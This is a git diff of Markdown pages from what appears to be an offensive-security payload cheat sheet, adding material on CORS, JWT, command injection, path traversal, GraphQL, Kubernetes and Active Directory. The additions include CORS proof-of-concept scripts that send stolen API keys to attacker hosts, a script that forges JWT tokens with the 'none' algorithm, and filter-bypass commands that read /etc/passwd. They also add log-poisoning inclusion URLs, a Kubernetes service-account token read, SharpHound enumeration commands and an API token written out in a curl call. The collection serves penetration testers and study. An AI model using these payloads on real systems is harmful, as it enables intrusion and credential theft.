|
@ -16,6 +16,7 @@
|
||||||
- [Twitter API Secret](#twitter-api-secret)
|
- [Twitter API Secret](#twitter-api-secret)
|
||||||
- [Twitter Bearer Token](#twitter-bearer-token)
|
- [Twitter Bearer Token](#twitter-bearer-token)
|
||||||
- [Gitlab Personal Access Token](#gitlab-personal-access-token)
|
- [Gitlab Personal Access Token](#gitlab-personal-access-token)
|
||||||
|
- [HockeyApp API Token](#hockeyapp-api-token)
|
||||||
- [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key)
|
- [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key)
|
||||||
|
|
||||||
|
|
||||||
|
@ -98,6 +99,13 @@ curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_toke
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### HockeyApp API Token
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Auth Bypass using pre-published Machine Key
|
### Auth Bypass using pre-published Machine Key
|
||||||
|
|
||||||
> By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token
|
> By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token
|
||||||
|
@ -126,3 +134,4 @@ $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
|
||||||
* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
|
* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
|
||||||
* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)
|
* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)
|
||||||
* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/)
|
* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/)
|
||||||
|
* [Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/)
|
|
@ -4,21 +4,28 @@
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
|
* [Tools](#tools)
|
||||||
* [Prerequisites](#prerequisites)
|
* [Prerequisites](#prerequisites)
|
||||||
* [Exploitation](#exploitation)
|
* [Exploitation](#exploitation)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3vCorsy/)
|
||||||
|
|
||||||
## Prerequisites
|
## Prerequisites
|
||||||
|
|
||||||
* BURP HEADER> `Origin: https://evil.com`
|
* BURP HEADER> `Origin: https://evil.com`
|
||||||
* VICTIM HEADER> `Access-Control-Allow-Credential: true`
|
* VICTIM HEADER> `Access-Control-Allow-Credential: true`
|
||||||
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com`
|
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
|
||||||
|
|
||||||
## Exploitation
|
## Exploitation
|
||||||
|
|
||||||
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
|
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
|
||||||
|
|
||||||
### Vulnerable example
|
### Vulnerable Example: Origin Reflection
|
||||||
|
|
||||||
|
#### Vulnerable Implementation
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
GET /endpoint HTTP/1.1
|
GET /endpoint HTTP/1.1
|
||||||
|
@ -33,7 +40,7 @@ Access-Control-Allow-Credentials: true
|
||||||
{"[private API key]"}
|
{"[private API key]"}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Proof of concept
|
#### Proof of concept
|
||||||
|
|
||||||
```js
|
```js
|
||||||
var req = new XMLHttpRequest();
|
var req = new XMLHttpRequest();
|
||||||
|
@ -74,6 +81,93 @@ or
|
||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Vulnerable Example: Null Origin
|
||||||
|
|
||||||
|
#### Vulnerable Implementation
|
||||||
|
|
||||||
|
It's possible that the server does not reflect the complete `Origin` header but
|
||||||
|
that the `null` origin is allowed. This would look like this in the server's
|
||||||
|
response:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /endpoint HTTP/1.1
|
||||||
|
Host: victim.example.com
|
||||||
|
Origin: null
|
||||||
|
Cookie: sessionid=...
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Access-Control-Allow-Origin: null
|
||||||
|
Access-Control-Allow-Credentials: true
|
||||||
|
|
||||||
|
{"[private API key]"}
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Proof of concept
|
||||||
|
|
||||||
|
This can be exploited by putting the attack code into an iframe using the data
|
||||||
|
URI scheme. If the data URI scheme is used, the browser will use the `null`
|
||||||
|
origin in the request:
|
||||||
|
|
||||||
|
```html
|
||||||
|
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
|
||||||
|
var req = new XMLHttpRequest ();
|
||||||
|
req.onload = reqListener;
|
||||||
|
req.open('get','https://victim.example.com/endpoint',true);
|
||||||
|
req.withCredentials = true;
|
||||||
|
req.send();
|
||||||
|
|
||||||
|
function reqListener() {
|
||||||
|
location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
|
||||||
|
};
|
||||||
|
</script>"></iframe>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Vulnerable Example: XSS on Trusted Origin
|
||||||
|
|
||||||
|
If the application does implement a strict whitelist of allowed origins, the
|
||||||
|
exploit codes from above do not work. But if you have an XSS on a trusted
|
||||||
|
origin, you can inject the exploit coded from above in order to exploit CORS
|
||||||
|
again.
|
||||||
|
|
||||||
|
```
|
||||||
|
https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Vulnerable Example: Wildcard Origin `*` without Credentials
|
||||||
|
|
||||||
|
If the server responds with a wildcard origin `*`, the browser does never send
|
||||||
|
the cookies. However, if the server does not require authentication, it's still
|
||||||
|
possible to access the data on the server. This can happen on internal servers
|
||||||
|
that are not accessible from the Internet. The attacker's website can then
|
||||||
|
pivot into the internal network and access the server's data withotu
|
||||||
|
authentication.
|
||||||
|
|
||||||
|
#### Vulnerable Implementation
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
GET /endpoint HTTP/1.1
|
||||||
|
Host: api.internal.example.com
|
||||||
|
Origin: https://evil.com
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Access-Control-Allow-Origin: *
|
||||||
|
|
||||||
|
{"[private API key]"}
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Proof of concept
|
||||||
|
|
||||||
|
```js
|
||||||
|
var req = new XMLHttpRequest();
|
||||||
|
req.onload = reqListener;
|
||||||
|
req.open('get','https://api.internal.example.com/endpoint',true);
|
||||||
|
req.send();
|
||||||
|
|
||||||
|
function reqListener() {
|
||||||
|
location='//atttacker.net/log?key='+this.responseText;
|
||||||
|
};
|
||||||
|
```
|
||||||
|
|
||||||
## Bug Bounty reports
|
## Bug Bounty reports
|
||||||
|
|
||||||
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
|
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
|
||||||
|
@ -88,3 +182,4 @@ or
|
||||||
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
|
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
|
||||||
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
|
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
|
||||||
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
|
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
|
||||||
|
* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors)
|
||||||
|
|
|
@ -111,8 +111,9 @@ something%0Acat%20/etc/passwd
|
||||||
|
|
||||||
### Bypass characters filter via hex encoding
|
### Bypass characters filter via hex encoding
|
||||||
|
|
||||||
linux
|
Linux
|
||||||
```
|
|
||||||
|
```powershell
|
||||||
swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
|
swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
|
||||||
/etc/passwd
|
/etc/passwd
|
||||||
|
|
||||||
|
@ -136,14 +137,13 @@ swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764)
|
||||||
|
|
||||||
swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
|
swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
|
||||||
root:x:0:0:root:/root:/bin/bash
|
root:x:0:0:root:/root:/bin/bash
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
### Bypass characters filter
|
### Bypass characters filter
|
||||||
|
|
||||||
Commands execution without backslash and slash - linux bash
|
Commands execution without backslash and slash - linux bash
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1}
|
swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1}
|
||||||
/
|
/
|
||||||
|
|
||||||
|
@ -158,7 +158,6 @@ swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< .
|
||||||
|
|
||||||
swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
|
swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
|
||||||
root:x:0:0:root:/root:/bin/bash
|
root:x:0:0:root:/root:/bin/bash
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
### Bypass Blacklisted words
|
### Bypass Blacklisted words
|
||||||
|
|
|
@ -123,6 +123,14 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
|
||||||
|
|
||||||
### Interesting Windows files
|
### Interesting Windows files
|
||||||
|
|
||||||
|
Always existing file in recent Windows machine.
|
||||||
|
Ideal to test path traversal but nothing much interesting inside...
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
c:\windows\system32\license.rtf
|
||||||
|
c:\windows\system32\eula.txt
|
||||||
|
```
|
||||||
|
|
||||||
Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
|
Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -167,5 +175,6 @@ The following log files are controllable and can be included with an evil payloa
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
* [Path Traversal Cheat Sheet: Windows](https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
|
||||||
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
|
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
|
||||||
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
|
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
|
||||||
|
|
|
@ -289,6 +289,8 @@ Just append your PHP code into the log file by doing a request to the service (A
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=/var/log/apache/access.log
|
http://example.com/index.php?page=/var/log/apache/access.log
|
||||||
http://example.com/index.php?page=/var/log/apache/error.log
|
http://example.com/index.php?page=/var/log/apache/error.log
|
||||||
|
http://example.com/index.php?page=/var/log/apache2/access.log
|
||||||
|
http://example.com/index.php?page=/var/log/apache2/error.log
|
||||||
http://example.com/index.php?page=/var/log/nginx/access.log
|
http://example.com/index.php?page=/var/log/nginx/access.log
|
||||||
http://example.com/index.php?page=/var/log/nginx/error.log
|
http://example.com/index.php?page=/var/log/nginx/error.log
|
||||||
http://example.com/index.php?page=/var/log/vsftpd.log
|
http://example.com/index.php?page=/var/log/vsftpd.log
|
||||||
|
|
|
@ -22,8 +22,12 @@
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
* [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap)
|
* [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap)
|
||||||
|
* [GraphQL-voyager - Represent any GraphQL API as an interactive graph](https://apis.guru/graphql-voyager/)
|
||||||
* [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
|
* [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
|
||||||
|
* [Graphql-path-enum - Lists the different ways of reaching a given type in a GraphQL schema](https://gitlab.com/dee-see/graphql-path-enum)
|
||||||
* [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
|
* [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
|
||||||
|
* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
|
||||||
|
* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
|
||||||
|
|
||||||
## Exploit
|
## Exploit
|
||||||
|
|
||||||
|
@ -152,6 +156,34 @@ query IntrospectionQuery {
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Single line query to dump the database schema without fragments.
|
||||||
|
|
||||||
|
```js
|
||||||
|
__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,description,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},isDeprecated,deprecationReason},inputFields{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},interfaces{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason,},possibleTypes{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}},directives{name,description,locations,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue}}}
|
||||||
|
```
|
||||||
|
|
||||||
|
### List path
|
||||||
|
|
||||||
|
```php
|
||||||
|
$ git clone https://gitlab.com/dee-see/graphql-path-enum
|
||||||
|
$ graphql-path-enum -i ./test_data/h1_introspection.json -t Skill
|
||||||
|
Found 27 ways to reach the "Skill" node from the "Query" node:
|
||||||
|
- Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||||
|
- Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||||
|
- Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||||
|
- Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||||
|
- Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||||
|
- Query (embedded_submission_form) -> EmbeddedSubmissionForm (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||||
|
- Query (external_program) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||||
|
- Query (external_programs) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||||
|
- Query (job_listing) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||||
|
- Query (job_listings) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||||
|
- Query (me) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||||
|
- Query (pentest) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||||
|
- Query (pentests) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||||
|
- Query (query) -> Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||||
|
- Query (query) -> Query (skills) -> Skill
|
||||||
|
```
|
||||||
|
|
||||||
### Extract data
|
### Extract data
|
||||||
|
|
||||||
|
|
|
@ -161,5 +161,7 @@ phpggc monolog/rce1 'phpinfo();' -s
|
||||||
* [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
|
* [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
|
||||||
* [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
|
* [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
|
||||||
* [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html)
|
* [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html)
|
||||||
* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web)
|
* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/meepwn-2017-write-ups/#TSULOTT-Web)
|
||||||
* [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d)
|
* [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d)
|
||||||
|
* [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web)
|
||||||
|
* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)
|
||||||
|
|
|
@ -100,37 +100,25 @@ To exploit this vulnerability, you just need to decode the JWT and change the al
|
||||||
|
|
||||||
However, this won't work unless you **remove** the signature
|
However, this won't work unless you **remove** the signature
|
||||||
|
|
||||||
The following code is a basic test for a None algorithm.
|
|
||||||
|
|
||||||
```python
|
|
||||||
import jwt
|
|
||||||
import base64
|
|
||||||
|
|
||||||
def b64urlencode(data):
|
|
||||||
return base64.b64encode(data).replace('+', '-').replace('/', '_').replace('=', '')
|
|
||||||
|
|
||||||
print b64urlencode("{\"typ\":\"JWT\",\"alg\":\"none\"}") + \
|
|
||||||
'.' + b64urlencode("{\"data\":\"test\"}") + '.'
|
|
||||||
```
|
|
||||||
|
|
||||||
Alternatively you can modify an existing JWT (be careful with the expiration time)
|
Alternatively you can modify an existing JWT (be careful with the expiration time)
|
||||||
|
|
||||||
```python
|
```python3
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python3
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ"
|
import jwt
|
||||||
header, payload, signature = jwt.split('.')
|
|
||||||
|
|
||||||
# Replacing the ALGO and the payload username
|
jwtToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ'
|
||||||
header = header.decode('base64').replace('HS256',"none")
|
|
||||||
payload = (payload+"==").decode('base64').replace('test','admin')
|
|
||||||
|
|
||||||
header = header.encode('base64').strip().replace("=","")
|
decodedToken = jwt.decode(jwtToken, verify=False) # Need to decode the token before encoding with type 'None'
|
||||||
payload = payload.encode('base64').strip().replace("=","")
|
noneEncoded = jwt.encode(decodedToken, key='', algorithm=None)
|
||||||
|
|
||||||
# 'The algorithm 'none' is not supported'
|
print(noneEncoded.decode())
|
||||||
print( header+"."+payload+".")
|
|
||||||
|
"""
|
||||||
|
Output:
|
||||||
|
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.
|
||||||
|
"""
|
||||||
```
|
```
|
||||||
|
|
||||||
## JWT Signature - RS256 to HS256
|
## JWT Signature - RS256 to HS256
|
||||||
|
@ -291,3 +279,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
|
||||||
- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
|
- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
|
||||||
- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
|
- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
|
||||||
- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)
|
- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)
|
||||||
|
- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass)
|
|
@ -25,6 +25,16 @@
|
||||||
|
|
||||||
* [katacoda](https://katacoda.com/courses/kubernetes). Learn Kubernetes using interactive broser-based scenarios.
|
* [katacoda](https://katacoda.com/courses/kubernetes). Learn Kubernetes using interactive broser-based scenarios.
|
||||||
|
|
||||||
|
## Service Token
|
||||||
|
|
||||||
|
> As it turns out, when pods (a Kubernetes abstraction for a group of containers) are created they are automatically assigned the default service account, and a new volume is created containing the token for accessing the Kubernetes API. That volume is then mounted into all the containers in the pod.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ cat /var/run/secrets/kubernetes.io/serviceaccount
|
||||||
|
|
||||||
|
# kubectl makes cluster compromise trivial as it will use that serviceaccount token without additional prompting
|
||||||
|
```
|
||||||
|
|
||||||
## RBAC Configuration
|
## RBAC Configuration
|
||||||
|
|
||||||
### Listing Secrets
|
### Listing Secrets
|
||||||
|
@ -189,3 +199,4 @@ http://<external-IP>:10255/pods
|
||||||
|
|
||||||
- [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://securityboulevard.com/2019/08/kubernetes-pentest-methodology-part-1)
|
- [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://securityboulevard.com/2019/08/kubernetes-pentest-methodology-part-1)
|
||||||
- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2)
|
- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2)
|
||||||
|
- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0)
|
|
@ -46,6 +46,9 @@
|
||||||
- [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384)
|
- [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384)
|
||||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||||
|
- [GenericAll](#genericall)
|
||||||
|
- [GenericWrite](#genericwrite)
|
||||||
|
- [WriteDACL](#writedacl)
|
||||||
- [Trust relationship between domains](#trust-relationship-between-domains)
|
- [Trust relationship between domains](#trust-relationship-between-domains)
|
||||||
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
||||||
- [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
|
- [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
|
||||||
|
@ -71,38 +74,50 @@
|
||||||
* [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
* [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
apt install bloodhound #kali
|
# start BloodHound and the database
|
||||||
neo4j console
|
root@payload$ apt install bloodhound #kali
|
||||||
|
root@payload$ neo4j console
|
||||||
|
root@payload$ ./bloodhound
|
||||||
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
|
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
|
||||||
./bloodhound
|
|
||||||
SharpHound.exe (from resources/Ingestor)
|
# run the ingestor on the machine using SharpHound.exe
|
||||||
SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
|
# https://github.com/BloodHoundAD/SharpHound3
|
||||||
SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
|
.\SharpHound.exe (from resources/Ingestor)
|
||||||
SharpHound.exe -c all -d active.htb -SearchForest
|
.\SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
|
||||||
SharpHound.exe --EncryptZip --ZipFilename export.zip
|
.\SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
|
||||||
or
|
.\SharpHound.exe -c all -d active.htb -SearchForest
|
||||||
|
.\SharpHound.exe --EncryptZip --ZipFilename export.zip
|
||||||
|
.\SharpHound.exe --CollectionMethod All --LDAPUser <UserName> --LDAPPass <Password> --JSONFolder <PathToFile>
|
||||||
|
|
||||||
|
# or run the ingestor on the machine using Powershell
|
